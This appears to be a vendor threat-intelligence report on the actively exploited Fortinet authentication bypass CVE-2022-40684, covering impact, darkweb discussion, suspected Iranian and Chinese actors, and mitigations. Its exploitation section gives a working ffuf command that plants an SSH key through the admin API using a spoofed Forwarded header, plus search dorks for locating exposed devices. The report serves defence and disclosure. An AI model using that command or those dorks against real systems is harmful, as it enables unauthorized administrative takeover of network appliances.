Fortinet Authentication Bypass Vulnerability Exploited by Threat Actors

Fortinet Authentication Bypass Vulnerability Exploited by Threat Actors

Fortinet Authentication Bypass Vulnerability Exploited by Threat Actors

EXECUTIVE SUMMARY

A critical Authentication Bypass Vulnerability in Fortinet Appliances tracked as CVE-2022-40684 has been discovered to be actively exploited in the wild. An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS, FortiProxy, and FortiSwitchManager could allow an unauthenticated attacker to perform administrative interface operations using specially crafted HTTP or HTTPS requests. Fortinet recently issued a PSIRT Advisory regarding CVE-2022-40684, which includes urgent mitigation guidance, upgrades, workarounds for customers, and recommended next steps.
The CYFIRMA research team conducted a detailed analysis of the vulnerability from the point of view of the exploit, as well as observed the underground forum discussion on vulnerability, and threat actor association.

KEY TAKEAWAYS

  • Successful exploitation of the vulnerability could allow the remote attacker to bypass security and gain privileged access to execute unauthorized code or commands.
  • Darkweb forum discussions indicated ransomware groups’ attention on the CVE. Also, casting light on threat actors’ interest in understanding what has changed in the patch at the time of the fix so that they can exploit older versions.
  • Our intelligence research community observed Iranian and Chinese threat actors abusing the vulnerabilities of Fortinet products. The suspected threat actors are US17IRGCorp aka APT34, HAFNIUM, and its affiliates in the ongoing campaign “درب عقب ” translating to “Tailgate”.
  • Method Discussed by Hackers and their Interest: Exploiting weakness in the systems, Man-in-the-Middle (MitM) attacks, potential ransomware attacks, and lateral movement into the organization network.

VULNERABILITY AT A GLANCE

Authentication Bypass Vulnerability in Fortigate

  • CVE-2022-40684
  • CVSS Score: 9.8
  • CYFIRMA Risk Rating: Critical
  • Exploit Detail: Link

Description:
An authentication bypass via an alternate path or channel [CWE-288] in Fortinet FortiOS versions 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy versions 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager versions 7.2.0 and 7.0.0 enables an unauthenticated attacker to perform administrative interface operations via specially crafted HTTP or HTTPS requests.

Impact:
Successful exploitation of the vulnerability could allow the remote attacker to bypass security and gain privileged access to execute unauthorized code or commands

Affected Version:

Security Indicators

  • Is there already an exploit tool to attack this vulnerability? Yes
  • Has this vulnerability already been used in an attack? Yes
  • Are hackers discussing this vulnerability in the Deep/Dark Web? Yes
  • What is the attack complexity level? Low
  • According to CISA’s Known Exploited Vulnerabilities Catalog, threat actors have historically exploited Fortinet vulnerabilities to obtain initial access and move laterally within a victim’s environment. We assess that threat actors will continue to exploit this vulnerability in the near future to obtain initial access resulting in access to sensitive information, such as the appliance’s configuration file, due to the ease of exploitation, the potential for payload delivery, and the presence of affected Fortinet units within enterprise environments.

Mitigation
Fortinet recently issued a PSIRT Advisory regarding CVE-2022-40684, which includes urgent mitigation guidance, upgrades, workarounds for customers, and recommended next steps. Please refer to the following link for the mitigation here.

EXPLOITING CVE-2022-40684
The CYFIRMA research team analyzed different methods of exploiting CVE-2022-40684.

Manually adding SSH keys to check if the target is vulnerable to exploit

Step 1: Add the SSH key to the vulnerable target using the add_key method.

Step 2: Log in to the vulnerable target using credentials saved from step 1 to access the Fortinet Administrative Interface

Step 3: After credentials are validated, the user will have access to Fortinet Administrative Interface. On the Logs page, we can validate that a new user has been added to the Interface with admin privilege access.

Automate with FFUF Scanner: Open-source exploit using FFUF Scanner
ffuf -w “host_list.txt:URL” -u “https://URL/api/v2/cmdb/system/admin/admin” -X PUT -H ‘User-Agent: Report Runner’ -H ‘Content-Type: application/json’ -H ‘Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″;’ -d ‘{“ssh-public-key1”: “cyfirma”}’ -mr “SSH” -r

Nuclei – Open-source exploit using Nuclei Template

Darkweb Observations
Our research team observed conversations around CVE-2022-40684 exploits in a famous underground forum. Bassterlord is a well-known name in the underground who had associations with LockBit, REvil, Avaddon, and RansomExx groups as a partner. The presence of Bassterlord in the Fortinet CVE conversation is an indication of ransomware groups’ attention on the CVE. The conversation also puts light on threat actors’ interest in understanding what has changed in the patch at the time of the fix so that they can exploit older versions.

Vulnerable Targets

OSNIT tools assist in identifying possible vulnerable targets.
OSINT Serach 1 – Google Dorks – intext:”Please Login” inurl:”/remote/login” – This dorks give more than 100+ vulnerable fortinet pages.


OSINT Serach 2 – raw_data.web.paths:”/api/v2/cmdb/system/admin”
In our OSINT research, we have found 200+ vulnerable IPs associated with CVE-2022-40684.


OSINT Search 3 – Shodan search returned 171k Fortinet FortiGate systems spread across the globe connected to the internet.


In another OSINT search, we found that around 16k Fortinet FortiGate units were vulnerable to 10 different vulnerabilities across the globe other than CVE-2022-40684.

MOST AFFECTED COUNTRIES

SUSPECTED THREAT ACTORS

Upon performing an analysis of the available internet-exposed Fortinet units through OSINT search passing through DeCYFIR attribution to threat actors, we have observed that Iranian and Chinese threat actors have already exploited Fortinet IPs for malicious activities.

Campaign Attribution

Our intelligence community research observed campaign “ درب عقب” translating to “Tailgate” suspected to be launched on 15 September 2022 targeting weak/vulnerable Fortinet products, which could be exploited using existing exploits by US17IRGCorp aka APT34 and its affiliates.

As part of the campaign, we also noticed Persian cybercriminals potentially colluding with Chinese groups and Russian cybercriminals. From a strategic viewpoint on the changing geopolitical scenarios from external threat landscape management, Iran and China are forming strategic relationships with Russia at all levels and have supported Russia in the ongoing Ukraine conflict.

Target Industries

Target Geographies

Motivation
Exfiltration of sensitive information for financial gains, and credential stealing for gaining elevated access to cause operational disruption and reputational damage.

INDICATORS OF COMPROMISE

CYFIRMA would like to highlight the potential risk and indicators observed which may be leveraged by nation-state threat actors to exploit the vulnerability and gain a foothold to exfiltrate sensitive information from the target organizations.

RECOMMENDED ACTIONS

  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthening defences based on the intelligence provided.
  • Integrate CTI feeds with existing SIEM solutions to allow faster detection and alerting of malicious activities. Enrich threat intelligence by combining local monitoring, and internal & external feeds.
  • Deploy an advanced Endpoint Detection and Response (EDR) engine as part of the organization’s layered security strategy.
  • Patch/upgrade all applications/software regularly with the latest versions when available on priority.
  • Configure network defence systems such as intrusion detection system (IDS), and intrusion prevention systems (IPS) for real-time alerts.
  • The use of CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is effective against automated bots.
  • Restrict the logins to a specific range of IP Addresses.
  • Implement Multi-Factor Authentication (MFA) to reduce the risk of potential data breaches.
  • Make the root user inaccessible via SSH by editing the sshd_config file and implementing the ‘DenyUsers root’ and ‘PermitRootLogin no’ options.
  • Move to a non-standard port for SSH instead of using the default port 22 and edit the new port line in the sshd_config file.
  • Move to a non-standard port for RDP instead of using the default port 3389.